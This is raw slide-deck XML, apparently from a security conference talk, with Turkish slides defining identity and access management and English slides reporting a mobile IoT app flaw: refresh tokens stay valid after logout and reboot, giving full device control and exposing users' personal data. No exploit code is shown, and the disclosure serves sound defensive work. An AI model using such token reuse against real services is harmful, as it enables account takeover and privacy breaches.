          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5056925" y="146025"/>
            <a:ext cx="4022400" cy="465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 sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IAM (Identity and Access Management) Nedir?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kullanıcıların kimliğini doğrulayan ve sistem kaynaklarına erişimlerini yöneten güvenlik mekanizmasıdır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ne İşe Yarar?</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Kullanıcıların </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kim olduğunu doğrular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (authentication)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Her kullanıcıya sadece </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ihtiyacı olan erişimi verir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (authorization)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Erişimleri </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kaydeder, izler ve denetler</a:t>
            </a:r>
            <a:endParaRPr b="1"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Kullanıcı yaşam döngüsünü yönetir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (oluşturma, yetki verme, silme)</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Güvenlik, gizlilik ve yasal uyumluluğu sağlar</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ne Yapar?</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Şifre, MFA, biyometrik gibi yöntemlerle </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>giriş güvenliği sağlar</a:t>
            </a:r>
            <a:endParaRPr b="1"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Roller ve politikalarla </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>erişim kontrolü uygular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (RBAC, ABAC)</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Yetkisiz erişimi önler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, veri sızıntısını engeller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SAML, OAuth, OIDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gibi protokollerle entegre çalışır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Bulut ve yerel sistemlerde merkezi yönetim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sunar</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661600" y="812675"/>
            <a:ext cx="9459900" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⚙️ Technical Background</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅ Expected Secure Behavior</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refresh tokens should expire shortly after logout</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Tokens should be single-use only</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App should enforce device-specific binding (e.g., IP, DeviceID)</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Rate limits should be in place for sensitive operations</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌ Observed Weak Behavior</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>refreshToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> remains valid post-logout and post-reboot</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Tokens are reusable an unlimited number of times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Full API access is possible without any re-authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463150" y="841975"/>
            <a:ext cx="8520600" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📌 Summary</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The mobile app failed to invalidate session refresh tokens after logout or device reboot. This allowed:</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Unlimited reuse of refresh tokens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Persistent validity even after logout</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Generation of new access tokens (accessKey, secretKey, sessionToken)</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Full control over the user's connected IoT devices and home data</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Sensitive Data Information Disclosure (e.g,mail, phone number, Geolocation coordinates (latitude and longitude</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;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descr="free cybersecurity PowerPoint templates" id="90" name="Google Shape;90;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9158636" cy="5156171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687760" y="303247"/>
            <a:ext cx="2628900" cy="692100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3900"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="3900" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
                <a:ea typeface="Nunito Sans"/>
                <a:cs typeface="Nunito Sans"/>
                <a:sym typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Who am I?</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="DEF CON RED TEAM VILLAGE" id="92" name="Google Shape;92;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537763" y="811756"/>
            <a:ext cx="2068478" cy="2068478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411625" y="1403975"/>
            <a:ext cx="2690100" cy="1217100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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94" name="Google Shape;94;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556400" y="1511825"/>
            <a:ext cx="3213000" cy="992700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870225" y="1404025"/>
            <a:ext cx="2893800" cy="1100400"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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96" name="Google Shape;96;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870225" y="1546975"/>
            <a:ext cx="3694800" cy="808200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953712" y="3204725"/>
            <a:ext cx="4827300" cy="992700"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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98" name="Google Shape;98;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137009" y="3287369"/>
            <a:ext cx="5067900" cy="808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200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Bachelor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
